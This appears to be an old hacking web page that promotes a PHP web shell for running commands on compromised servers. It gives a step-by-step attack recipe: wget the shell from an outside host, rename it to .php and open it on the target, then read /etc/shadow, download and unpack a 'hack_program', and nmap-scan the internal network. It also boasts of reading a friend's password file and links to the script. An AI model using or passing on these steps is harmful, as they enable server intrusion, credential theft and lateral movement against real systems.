web_shell : Web based shell interface
Often times vulnerabilities in PHP or other scripts are found that allow an anonymous user to upload files of his choice to the web directories or maybe even just run a single command. That is where web_shell comes in. This is a PHP script that essentially gives you the ability to run shell commands on the server
via a web interface and view the results. This script was written for use on an Apache test server running on Fedora Linux but probably runs fine on any linux based apache server. Using this script makes it is possible to view unparsed code of other server side scripts located on the server and depending on what programs are installed on the server you could potentially run nmap scans on other target machines via the server etc...You can also *wget* binaries (.zip/.tar) off of other servers like from dummy geocities accounts. Most systems have the zip and unzip programs installed so you could easily transport and unpack your hack_program.
Example usage:
Maybe you run across a flaw that allows a command to be run or maybe you have the ability to write (include) files to the server. so think like this:
Command 1: wget http://geocities.com/foobar/web_shell.txt
Command 2: mv web_shell.txt web_shell.php
Now simply access http://targetserver.com/web_shell.php for *shell access* without leaving a mess of hacked URL's in the logs. Once again the same command principles apply to web_shell.php. You could think like this:
Command 1: cat /etc/password or cat /etc/shadow *might get lucky*
Command 2: wget http://geocities.com/foobar/hack_program.zip
Command 3: unzip hack_program.zip
etc...
Also, maybe you can ls around and cat various scripts found on the server, you might find a script that could be manipulated to run commands as a privledged user like root or system. Note: since we arent actually logged into a shell we cant interact with scripts (we can run the script but if it asks for user input we cant input anything) so we are limited to what we can accomplish via command line arguments.
For even further cracking...try these commands:
To get the servers local IP:
ifconfig
Assuming the IP returned was 192.168.1.23 we would now run a ping scan on that entire range to see what else we might could get into.
nmap -sP 192.168.1.*
Screenshot of this script reading a password file off of a friends server (He had a vulnerable web app running):
To download this script click here: Web based shell interface.